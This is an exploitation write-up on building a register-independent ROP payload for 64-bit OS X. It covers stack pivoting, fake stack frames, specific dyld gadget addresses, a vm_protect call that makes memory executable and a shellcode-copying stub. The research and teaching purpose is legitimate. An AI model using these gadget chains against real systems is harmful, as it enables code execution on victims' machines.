One of the hurdles you will encounter during OS X exploitation is the ASLR/DEP combination for 64-bit processes (32-bit processes don’t have DEP [1]). When implemented correctly, it’s an effective mitigation that can be circumvented only with an info leak. (Un)fortunately, OS X versions up to the recent Lion (10.7) offer only incomplete ASLR, which still allows attackers to execute arbitrary code. One of the problems (among others) is that the dyld (dynamic loader) image is located at the same address in every process. This makes ROP possible: by controlling the stack, we can reuse snippets of code from dyld and, in effect, execute arbitrary code.

The only public ROP dyld shellcode for OS X was presented in [1]. Charlie Miller’s version works under the assumption that rax and rdi have specific values. Due to the x64 calling convention [2], it is very probable that this precondition is met. Nevertheless, it would be useful to create a shellcode with weaker assumptions, and that’s exactly what this post is about. We will create a generic ROP shellcode, similar to sayonara, but for OS X :).

Stack pivoting

We assume that rsp is fully controlled. Sometimes, achieving such a state is a nontrivial task in itself: for every bug, exploitation can begin with different register/memory values. In [1], an easy case of stack pivoting is described: we start with rax pointing to controlled memory, and rdi pointing to a valid buffer. We then set rsp = rax with:

    0x00007fff5fc24c8b mov QWORD PTR [rdi+0x38],rax
    (irrelevant)
    0x00007fff5fc24cd8 mov rsp,QWORD PTR [rdi+0x38]
    0x00007fff5fc24cdc pop rdi
    0x00007fff5fc24cdd ret

Easy! The problem is, we might not be lucky enough to start with rax pointing to fully controlled memory. For example, we may start with the following:

call [rax+0x100]

Here, memory in the range [rax, rax+0xF0] is random, and we control the buffer starting at rax+0xF1. Starting conditions are different for every bug, and pivoting the stack can be even harder than creating a ROP chain: during pivoting, the state we start with can be completely arbitrary, whereas during ROP we already control the stack.

There is no generic way to remedy this problem, but having a large database of usable gadgets would certainly help :). That brings us to an annoying problem: the “leave” instruction. “Leave” is equivalent to:

    mov rsp, rbp
    pop rbp

If we don’t control rbp, we will lose control of the stack. The problem is, “leave” is very often present before “ret”, effectively limiting the number of gadgets we can use.
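To make the failure mode concrete, here is a toy Python model of “leave / ret” acting on a simulated stack. It is only a sketch: the addresses and values are made up for illustration, and nothing here touches a real process.

```python
# Toy model of "leave; ret" on a simulated 64-bit stack.
# All addresses and values below are hypothetical.

def leave_ret(regs, memory):
    """Apply 'leave' then 'ret' to a register dict and a {address: qword} dict."""
    regs["rsp"] = regs["rbp"]            # leave, step 1: mov rsp, rbp
    regs["rbp"] = memory[regs["rsp"]]    # leave, step 2: pop rbp
    regs["rsp"] += 8
    regs["rip"] = memory[regs["rsp"]]    # ret: pop rip
    regs["rsp"] += 8
    return regs

# rsp points at memory we control, but rbp points somewhere we do not.
memory = {
    0x1000: 0xAAAA,  # controlled: the next address we hoped to return to
    0x9000: 0x0,     # uncontrolled: slot that "pop rbp" reads
    0x9008: 0xDEAD,  # uncontrolled: slot that "ret" reads
}
regs = leave_ret({"rsp": 0x1000, "rbp": 0x9000, "rip": 0}, memory)
print(hex(regs["rip"]), hex(regs["rsp"]))
```

In this model the return address is taken from wherever rbp pointed, not from the memory rsp pointed at before the “leave”.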

Fortunately, there is a little trick that will allow us to use any “leave” gadget. We need to create a “fake” stack frame with a series of 3 indirect calls, like so:

    call [rax] ---------> push rbp
    (...) <----------+    mov rbp, rsp
    call [rax+4] --+ |    (...)
                   | |    call [rax+8] ---> (gadget)
                   | |                      leave
                   | +--------------------- ret
                   +--> continue

Start from call [rax] and follow the execution flow along the arrows. With such a construct, we can safely call any gadget ending with “leave / ret”. Such sequences (two indirect calls with different displacements near each other) may be rare, but we don’t need many of them; one is sufficient. We can use the second call (call [rax+4]) to jump to a sequence that will perturb rax and then jump back to “call [rax]”, allowing us to use the same “dispatcher” gadget as many times as we need to use a “leaver”. Here’s an example of such a dispatcher, from dyld:

DISPATCHER:

    __text:00007FFF5FC0D1BF call qword ptr [rax+78h]
    __text:00007FFF5FC0D1C2 mov rsi, rax
    __text:00007FFF5FC0D1C5 test rax, rax
    __text:00007FFF5FC0D1C8 jz short loc_7FFF5FC0D1E0
    __text:00007FFF5FC0D1CA mov rax, [rbx]
    __text:00007FFF5FC0D1CD mov rcx, rbx
    __text:00007FFF5FC0D1D0 mov rdx, r12
    __text:00007FFF5FC0D1D3 mov rdi, rbx
    __text:00007FFF5FC0D1D6 call qword ptr [rax+80h]

FAKE FRAME SETUP:

    __text:00007FFF5FC0CD44 push rbp
    __text:00007FFF5FC0CD45 mov rbp, rsp
    __text:00007FFF5FC0CD48 mov [rbp+var_18], rbx
    __text:00007FFF5FC0CD4C mov [rbp+var_10], r12
    __text:00007FFF5FC0CD50 mov [rbp+var_8], r13
    __text:00007FFF5FC0CD54 sub rsp, 20h
    __text:00007FFF5FC0CD58 mov r12, rdi
    __text:00007FFF5FC0CD5B mov r13d, esi
    __text:00007FFF5FC0CD5E mov rax, [rdi]
    __text:00007FFF5FC0CD61 call qword ptr [rax+1A0h]

A few preconditions related to register values must be met for the gadgets above to work. Since we don’t control the stack during pivoting, we need to use gadgets ending with indirect jumps, or calls, to set registers and memory to the necessary values.
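The fake-frame trick can be traced with a small Python model. This is a sketch under simplifying assumptions: the two return addresses are hypothetical labels, the simulated stack starts at an arbitrary address, and the register shuffling done by the real gadgets is ignored. It only shows that, after “leave / ret”, execution resumes right after the first call with rsp and rbp restored.

```python
# Toy trace of the fake-frame trick. Addresses are hypothetical labels.

AFTER_FIRST_CALL = 0x1003   # instruction following "call [rax]" in the dispatcher
AFTER_INNER_CALL = 0x2010   # instruction following "call [rax+8]" in the frame setup

class Cpu:
    def __init__(self, rsp, rbp):
        self.rsp, self.rbp, self.rip = rsp, rbp, 0
        self.stack = {}

    def push(self, value):
        self.rsp -= 8
        self.stack[self.rsp] = value

    def pop(self):
        value = self.stack[self.rsp]
        self.rsp += 8
        return value

def run_fake_frame(cpu):
    cpu.push(AFTER_FIRST_CALL)   # call [rax]    -> enters the frame-setup gadget
    cpu.push(cpu.rbp)            # push rbp
    cpu.rbp = cpu.rsp            # mov rbp, rsp  -> rbp now points at a known frame
    cpu.rsp -= 0x20              # sub rsp, 20h  (locals; contents do not matter)
    cpu.push(AFTER_INNER_CALL)   # call [rax+8]  -> enters the "leave; ret" gadget
    # ... the body of the gadget would run here ...
    cpu.rsp = cpu.rbp            # leave: mov rsp, rbp
    cpu.rbp = cpu.pop()          #        pop rbp
    cpu.rip = cpu.pop()          # ret
    return cpu

cpu = run_fake_frame(Cpu(rsp=0x7000, rbp=0x4141414141414141))
print(hex(cpu.rip), hex(cpu.rsp), hex(cpu.rbp))
```

The initial rbp is deliberately a junk value: the frame setup saves and restores it, so the gadget never needs it to be valid.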

The “leave” problem is particularly crippling during pivoting, and that’s when fake frames should be used. During ROP, it’s easier to just control rbp and point it to memory set up earlier.

ROP

The plan is simple: use gadgets from dyld to create an RWX memory area (using vm_protect), then copy normal shellcode to that area and jump to it.

Here’s the vm_protect call we will use to make memory from dyld’s .data section executable:

    __text:00007FFF5FC0D34A mov r8d, ebx ; new_protection
    __text:00007FFF5FC0D34D xor ecx, ecx ; set_maximum
    __text:00007FFF5FC0D34F mov rdx, rax ; size
    __text:00007FFF5FC0D352 mov rsi, [rbp+address] ; address
    __text:00007FFF5FC0D356 lea rax, _mach_task_self_
    __text:00007FFF5FC0D35D mov edi, [rax] ; target_task
    __text:00007FFF5FC0D35F call _vm_protect
    __text:00007FFF5FC0D364 test eax, eax
    __text:00007FFF5FC0D366 jz short loc_7FFF5FC0D38D
    __text:00007FFF5FC0D38D loc_7FFF5FC0D38D:
    __text:00007FFF5FC0D38D cmp byte ptr [r12+0FAh], 0
    __text:00007FFF5FC0D396 jz short loc_7FFF5FC0D406
    __text:00007FFF5FC0D406 loc_7FFF5FC0D406:
    __text:00007FFF5FC0D406 mov rbx, [rbp+var_28]
    __text:00007FFF5FC0D40A mov r12, [rbp+var_20]
    __text:00007FFF5FC0D40E mov r13, [rbp+var_18]
    __text:00007FFF5FC0D412 mov r14, [rbp+var_10]
    __text:00007FFF5FC0D416 mov r15, [rbp+var_8]
    __text:00007FFF5FC0D41A leave
    __text:00007FFF5FC0D41B retn

This is the same technique as in [1]. A few registers need to be set for this to work: the registers used as parameters for vm_protect, and rbp, to survive the “leave / ret” at the end. We can set them one by one, jumping over different gadgets as described in [1], or set them all at once, using the following:

    __text:00007FFF5FC24CA1 mov rax, [rdi]
    __text:00007FFF5FC24CA4 mov rbx, [rdi+8]
    __text:00007FFF5FC24CA8 mov rcx, [rdi+10h]
    __text:00007FFF5FC24CAC mov rdx, [rdi+18h]
    __text:00007FFF5FC24CB0 mov rsi, [rdi+28h]
    __text:00007FFF5FC24CB4 mov rbp, [rdi+30h]
    __text:00007FFF5FC24CB8 mov r8, [rdi+40h]
    __text:00007FFF5FC24CBC mov r9, [rdi+48h]
    __text:00007FFF5FC24CC0 mov r10, [rdi+50h]
    __text:00007FFF5FC24CC4 mov r11, [rdi+58h]
    __text:00007FFF5FC24CC8 mov r12, [rdi+60h]
    __text:00007FFF5FC24CCC mov r13, [rdi+68h]
    __text:00007FFF5FC24CD0 mov r14, [rdi+70h]
    __text:00007FFF5FC24CD4 mov r15, [rdi+78h]
    __text:00007FFF5FC24CD8 mov rsp, [rdi+38h]
    __text:00007FFF5FC24CDC pop rdi
    __text:00007FFF5FC24CDD retn

We can fill a buffer in dyld’s .data section with the values we want to load into the registers and simply call the above gadget. The only problem with this approach is rsp being overwritten (mov rsp, [rdi+38h]), but we can remedy this by creating a “fake” stack somewhere in memory :).
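The buffer layout that the register-loading gadget expects can be written down as a small Python helper. This is a sketch: the offsets are read off the listing above, while the helper name and the example values are hypothetical placeholders. Note that the gadget does not load rdi from the buffer (offset 0x20 is skipped); rdi is popped from the new stack instead.

```python
import struct

# Offsets read by the register-loading gadget, taken from the listing above.
# Offset 0x20 is unused by this gadget: rdi is popped from the new stack instead.
OFFSETS = {
    "rax": 0x00, "rbx": 0x08, "rcx": 0x10, "rdx": 0x18,
    "rsi": 0x28, "rbp": 0x30, "rsp": 0x38,
    "r8": 0x40, "r9": 0x48, "r10": 0x50, "r11": 0x58,
    "r12": 0x60, "r13": 0x68, "r14": 0x70, "r15": 0x78,
}

def build_register_buffer(values):
    """Pack {register name: 64-bit value} into a 0x80-byte little-endian buffer."""
    buf = bytearray(0x80)
    for name, value in values.items():
        struct.pack_into("<Q", buf, OFFSETS[name], value)
    return bytes(buf)

# Placeholder values, purely to show where each register lands.
buf = build_register_buffer({"rbx": 0x7, "rsp": 0x1122334455667788})
print(buf.hex())
```

Registers left out of the dictionary are simply loaded with zero in this model.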

Below is a WRITE MEM gadget sequence we can use.

    __text:00007FFF5FC23373 pop rbx
    __text:00007FFF5FC23374 retn

    __text:00007FFF5FC24CDC pop rdi
    __text:00007FFF5FC24CDD retn

    __text:00007FFF5FC24CE1 mov [rdi+8], rbx
    __text:00007FFF5FC24CE5 mov [rdi+10h], rcx
    __text:00007FFF5FC24CE9 mov [rdi+18h], rdx
    __text:00007FFF5FC24CED mov [rdi+20h], rdi
    __text:00007FFF5FC24CF1 mov [rdi+28h], rsi
    __text:00007FFF5FC24CF5 mov [rdi+30h], rbp
    __text:00007FFF5FC24CF9 mov [rdi+38h], rsp
    __text:00007FFF5FC24CFD add qword ptr [rdi+38h], 8
    __text:00007FFF5FC24D02 mov [rdi+40h], r8
    __text:00007FFF5FC24D06 mov [rdi+48h], r9
    __text:00007FFF5FC24D0A mov [rdi+50h], r10
    __text:00007FFF5FC24D0E mov [rdi+58h], r11
    __text:00007FFF5FC24D12 mov [rdi+60h], r12
    __text:00007FFF5FC24D16 mov [rdi+68h], r13
    __text:00007FFF5FC24D1A mov [rdi+70h], r14
    __text:00007FFF5FC24D1E mov [rdi+78h], r15
    __text:00007FFF5FC24D22 mov rsi, [rsp+0]
    __text:00007FFF5FC24D26 mov [rdi+80h], rsi
    __text:00007FFF5FC24D2D retn

First we pop the value, then the address, and finally set memory with “mov [rdi+8], rbx”. Notice that we also trash values higher in memory, from rdi+0x10 to rdi+0x80, so we need to remember to write to LOWER addresses first.
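The ordering constraint is easy to check with a toy Python model of the write sequence. It is a sketch, not a faithful emulation: the trashed slots are simply marked with a placeholder rather than real register contents, and the target addresses are hypothetical.

```python
# Toy model of the WRITE MEM sequence. Each write stores the value at rdi+8
# and overwrites the 15 qwords from rdi+0x10 through rdi+0x80.

TRASH = None  # stands in for whatever the other registers happened to hold

def write_qword(memory, target, value):
    """Model 'pop rbx; pop rdi; mov [rdi+8], rbx; ...' with rdi = target - 8."""
    rdi = target - 8
    memory[rdi + 8] = value
    for offset in range(0x10, 0x88, 8):   # rdi+0x10 .. rdi+0x80 inclusive
        memory[rdi + offset] = TRASH
    return memory

def write_all(targets_in_order, values):
    memory = {}
    for target in targets_in_order:
        write_qword(memory, target, values[target])
    return memory

values = {0x5000: 1, 0x5008: 2, 0x5010: 3}   # hypothetical addresses and data
ascending = write_all(sorted(values), values)
descending = write_all(sorted(values, reverse=True), values)

survived_up = [ascending[a] == v for a, v in values.items()]
survived_down = [descending[a] == v for a, v in values.items()]
print(survived_up, survived_down)
```

Writing in ascending order keeps every value intact, because each later write repairs the slot that an earlier write trashed; in descending order only the lowest address survives.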

We could copy our “normal shellcode” to RWX memory using the above sequence, but it would be wasteful in terms of stack space. Observe that to copy a single QWORD, we need 5 QWORDs on the stack (3 gadgets, address, value). It’s more efficient to create a small “stub” that will take care of this.

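    ; copy normal shellcode to RWX area
    ; size = 0x1000
    stub:
        lea rsi, [r15+offset]             ; source: shellcode on the old stack
        xor rcx, rcx
        inc rcx
        shl rcx, 12                       ; rcx = 0x1000 bytes to copy
        lea rdi, [rel normal_shellcode]   ; destination, rip-relative addressing
        rep movsb
    normal_shellcode:

rsi is set to point to the old stack (passed in r15), where the normal shellcode starts at a constant offset. We save a bit of space by using rip-relative addressing (an x64 feature) to set rdi, rather than a constant 8-byte address. Since rdi points just past the stub, execution falls through into the copied shellcode once “rep movsb” finishes.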
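For a sense of scale, the following Python sketch compares the two approaches for the 0x1000-byte copy the stub performs. The 5-QWORD cost per write comes from the text above; the 0x20-byte stub size and the payload contents are made-up placeholders, and the copy loop assumes the direction flag is clear so that “rep movsb” copies forward.

```python
QWORD = 8
SLOTS_PER_WRITE = 5          # 3 gadget addresses + target address + value

def gadget_copy_cost(payload_size):
    """Stack bytes consumed if every payload qword is written by the gadget sequence."""
    qwords = -(-payload_size // QWORD)   # ceiling division
    return qwords * SLOTS_PER_WRITE * QWORD

# xor rcx, rcx / inc rcx / shl rcx, 12
rcx = 0
rcx += 1
rcx <<= 12

def rep_movsb(src, dst, dst_offset, count):
    """Byte-wise forward copy, modelling 'rep movsb' with the direction flag clear."""
    for i in range(count):
        dst[dst_offset + i] = src[i]

old_stack = bytes(range(256)) * 16      # stand-in for 0x1000 bytes of payload
rwx_area = bytearray(0x20 + rcx)        # hypothetical: 0x20 bytes of stub, then the copy
rep_movsb(old_stack, rwx_area, 0x20, rcx)
print(hex(rcx), gadget_copy_cost(rcx))
```

Under these assumptions, copying the payload purely with the write sequence would take five times the payload size in stack space, whereas with the stub the payload sits on the stack once and only the stub itself has to be written with gadgets.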

To summarize:

set register values in dyld’s .data buffer

create a fake stack and a fake stack frame in memory

copy stub to future RWX area

set all registers to correct values

use vm_protect to create RWX area

load r15 with previous stack pointer

jump to RWX memory

stub will copy our “normal” shellcode from old stack to RWX mem

???

PROFIT!

That’s it. The resulting ROP shellcode is bigger than the one in [1], but it doesn’t assume anything about registers. There is room for improvement, but in environments where you can spray megabytes of memory with JavaScript (like in Safari ;)), the size of the shellcode is not critical.

You can download the final version here.

References:

[1] Charlie Miller, Mac OS X Hacking (Snow Leopard Edition), 2010

[2] Jon Larimer, Intro to x64 Reversing, 2011